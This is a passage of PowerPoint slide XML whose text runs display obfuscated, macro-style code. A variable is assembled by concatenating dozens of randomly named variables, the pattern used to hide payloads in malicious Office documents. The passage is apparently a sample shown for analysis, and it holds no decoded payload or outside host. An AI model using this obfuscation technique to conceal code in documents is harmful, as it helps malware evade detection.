              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rQeqZg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HABrov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kbGliiI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>KsxHlO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>STIUTu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lYVZuG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tPyNlL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CBvstp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>YyNArAf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nZKJBK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MofWYGr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DDadug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LLiVePZ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ehhpzr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ehhpzr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cRujae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BKoqYwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vyNFfG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FQHXTIk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lckFda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>TFnlWAj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tdrzhUq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>smSGxU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tbwObc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hymUPc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SXmEBPW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>TzHxJN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eTRcXOB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>isJoPG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wWYfLB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>zsOcBF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>KKlHQWk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GAUhcB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BXlStJL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>yNizpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WCcClJr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>movhdmF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NXTOcu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pMqmrJ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RuxVkx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ehhpzr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ehhpzr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dsDbJCr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WcLFRA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xAQkNY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wtaPKs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LxMpHUz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eGZaocg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GVTPxoo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rQDhMG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cBblHn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DsRfOhd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eWPurMU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>qmwnHTO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pYQlooj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xDZEPW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xEPoIu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>foIOkh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WIkDSM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lPnQrqI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DeVhut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tDPitaP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GcDlHJD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>TfBhrfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>oJKcAVV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>VoNtQRp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>oWwggE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LKatdx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>zlJPuy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>KCYbUF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
